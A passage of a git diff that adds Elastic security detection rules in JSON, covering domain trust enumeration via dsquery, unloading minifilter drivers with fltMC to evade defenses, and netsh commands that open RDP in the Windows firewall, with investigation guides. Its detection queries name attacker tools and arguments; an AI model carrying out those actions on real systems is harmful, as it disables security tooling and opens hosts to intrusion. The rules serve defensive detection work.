transfer.", + "from": "now-90m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_file_size_remote_file_transfer", + "name": "Unusual Remote File Size", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "0678bc9c-b71a-433b-87e6-2f664b6b3131", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "0678bc9c-b71a-433b-87e6-2f664b6b3131_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_7.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_7.json new file mode 100644 index 00000000000..3495c0323e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_7.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of dsquery.exe for domain trust discovery purposes. Adversaries may use this command-line utility to enumerate trust relationships that may be used for Lateral Movement opportunities in Windows multi-domain forest environments.", + "false_positives": [ + "Domain administrators may use this command-line utility for legitimate information gathering purposes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumerating Domain Trusts via DSQUERY.EXE", + "note": "## Triage and analysis\n\n### Investigating Enumerating Domain Trusts via DSQUERY.EXE\n\nActive Directory (AD) domain trusts define relationships between domains within a Windows AD environment. In this setup, a \"trusting\" domain permits users from a \"trusted\" domain to access resources. These trust relationships can be configurable as one-way, two-way, transitive, or non-transitive, enabling controlled access and resource sharing across domains.\n\nThis rule identifies the usage of the `dsquery.exe` utility to enumerate domain trusts. Attackers can use this information to enable the next actions in a target environment, such as lateral movement.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation and are done within the user business context (e.g., an administrator in this context). As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Enumerating Domain Trusts via NLTEST.EXE - 84da2554-e12a-11ec-b896-f661ea17fbcd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"dsquery.exe\" or ?process.pe.original_file_name: \"dsquery.exe\") and \n process.args : \"*objectClass=trustedDomain*\"\n", + "references": [ + "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952(v=ws.11)", + "https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "06a7a03c-c735-47a6-a313-51c354aef6c3", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "06a7a03c-c735-47a6-a313-51c354aef6c3_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_109.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_109.json new file mode 100644 index 00000000000..5a3a8ece1e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_109.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Filter Manager Control Program (fltMC.exe) binary may be abused by adversaries to unload a filter driver and evade defenses.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Evasion via Filter Manager", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\" and\n not\n (\n (\n process.executable : \"?:\\\\Program Files (x86)\\\\ManageEngine\\\\UEMS_Agent\\\\bin\\\\DCFAService64.exe\" and\n process.args : (\"DFMFilter\", \"DRMFilter\")\n ) or\n (\n process.executable : \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\" and\n process.args : (\"BrFilter_*\", \"BrCow_*\") and\n user.id : \"S-1-5-18\"\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_110.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_110.json new file mode 100644 index 00000000000..e34f5d3ccfa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_110.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Filter Manager Control Program (fltMC.exe) binary may be abused by adversaries to unload a filter driver and evade defenses.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Evasion via Filter Manager", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\" and\n not\n (\n (\n process.executable : \"?:\\\\Program Files (x86)\\\\ManageEngine\\\\UEMS_Agent\\\\bin\\\\DCFAService64.exe\" and\n process.args : (\"DFMFilter\", \"DRMFilter\")\n ) or\n (\n process.executable : \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\" and\n process.args : (\"BrFilter_*\", \"BrCow_*\") and\n user.id : \"S-1-5-18\"\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_109.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_109.json new file mode 100644 index 00000000000..14b81b434c2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_109.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the network shell utility (netsh.exe) to enable inbound Remote Desktop Protocol (RDP) connections in the Windows Firewall.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Desktop Enabled in Windows Firewall by Netsh", + "note": "## Triage and analysis\n\n### Investigating Remote Desktop Enabled in Windows Firewall by Netsh\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts.\n\nThis rule detects the creation of a Windows Firewall inbound rule that would allow inbound RDP traffic using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- The `netsh.exe` utility can be used legitimately. Check whether the user should be performing this kind of activity, whether the user is aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or ?process.pe.original_file_name == \"netsh.exe\") and\n process.args : (\"localport=3389\", \"RemoteDesktop\", \"group=\\\"remote desktop\\\"\") and\n process.args : (\"action=allow\", \"enable=Yes\", \"enable\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "074464f9-f30d-4029-8c03-0ed237fffec7_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_110.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_110.json new file mode 100644 index 00000000000..04b267f9d5f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_110.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the network shell utility (netsh.exe) to enable inbound Remote Desktop Protocol (RDP) connections in the Windows Firewall.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Desktop Enabled in Windows Firewall by Netsh", + "note": "## Triage and analysis\n\n### Investigating Remote Desktop Enabled in Windows Firewall by Netsh\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts.\n\nThis rule detects the creation of a Windows Firewall inbound rule that would allow inbound RDP traffic using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- The `netsh.exe` utility can be used legitimately. Check whether the user should be performing this kind of activity, whether the user is aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or ?process.pe.original_file_name == \"netsh.exe\") and\n process.args : (\"localport=3389\", \"RemoteDesktop\", \"group=\\\"remote desktop\\\"\") and\n process.args : (\"action=allow\", \"enable=Yes\", \"enable\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "074464f9-f30d-4029-8c03-0ed237fffec7_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_6.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_6.json new file mode 100644 index 00000000000..c34d1072a61 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_6.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and 